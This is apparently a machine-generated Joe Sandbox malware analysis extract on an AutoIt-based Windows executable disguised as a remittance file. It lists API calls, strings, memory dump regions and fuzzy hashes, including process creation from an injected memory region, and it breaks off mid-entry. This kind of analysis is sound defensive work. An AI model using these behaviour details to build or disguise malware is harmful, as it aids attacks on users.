                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                      • String ID: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3170942423-3351384526
                                                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                      Control-flow Graph (image not reproduced; basic blocks 401250-4012ed and 4272ec-4273b4, nodes call KillTimer, SetTimer, Shell_NotifyIconW)
                                                                      APIs
                                                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 3300667738-0
                                                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                      Control-flow Graph (image not reproduced; basic blocks 40e4c0-40e4f0 and 427190-42722a, nodes call RegOpenKeyExW, RegQueryValueExW, RegCloseKey)
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$CloseOpen
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                      • API String ID: 1586453840-614718249
                                                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                      APIs
                                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcsncpy.LIBCMT ref: 00401C41
                                                                      • _wcscpy.LIBCMT ref: 00401C5D
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                      • String ID: Line:
                                                                      • API String ID: 1874344091-1585850449
                                                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$OpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 1607946009-824357125
                                                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                      APIs
                                                                        • Part of subcall function 03EC4710: Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EC4924
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: F8LNA0E3T8M0YP1UJI4N
                                                                      • API String ID: 2694422964-335757165
                                                                      • Opcode ID: 774cc8864c3b666e66f2fbe01b09cdc285027324f1eb1fc5d0b689117dc3dac3
                                                                      • Instruction ID: 9c95508b7f3769408d882dbdae9c4db95c0fb71c998996a73376fbd980e9c370
                                                                      • Opcode Fuzzy Hash: 774cc8864c3b666e66f2fbe01b09cdc285027324f1eb1fc5d0b689117dc3dac3
                                                                      • Instruction Fuzzy Hash: 9651B271D14399DAEF12DBA4C919BEFBBB8AF05304F044199E6087B2C0D7790B49CBA5
                                                                      APIs
                                                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                      • _free.LIBCMT ref: 004295A0
                                                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3938964917-768773625
                                                                      • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                      • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: Error:
                                                                      • API String ID: 4104443479-232661952
                                                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                      • String ID: X$pWH
                                                                      • API String ID: 85490731-941433119
                                                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03EC34B5
                                                                      • ExitProcess.KERNEL32(00000000), ref: 03EC34D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateExit
                                                                      • String ID: D
                                                                      • API String ID: 126409537-2746444292
                                                                      • Opcode ID: 107eb1cf29a6b6651620623ade647468eaff304108e4c4019dc24045849d9433
                                                                      • Instruction ID: d8ac82ff4e8a9292fec821f88fa8e2d4cdfbbde0ca94fc74f2318845d05196c4
                                                                      • Opcode Fuzzy Hash: 107eb1cf29a6b6651620623ade647468eaff304108e4c4019dc24045849d9433
                                                                      • Instruction Fuzzy Hash: 91F0FFB555424CABDB60DFE1CD49FEE777CBF44705F048A08FB0A9A180DA7896088B61
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _memmove.LIBCMT ref: 00401B57
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                      • String ID: @EXITCODE
                                                                      • API String ID: 2734553683-3436989551
                                                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                      Strings
                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                      • C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 00410107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _strcat
                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 1765576173-3640349533
                                                                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1794320848-0
                                                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                      Memory Dump Source
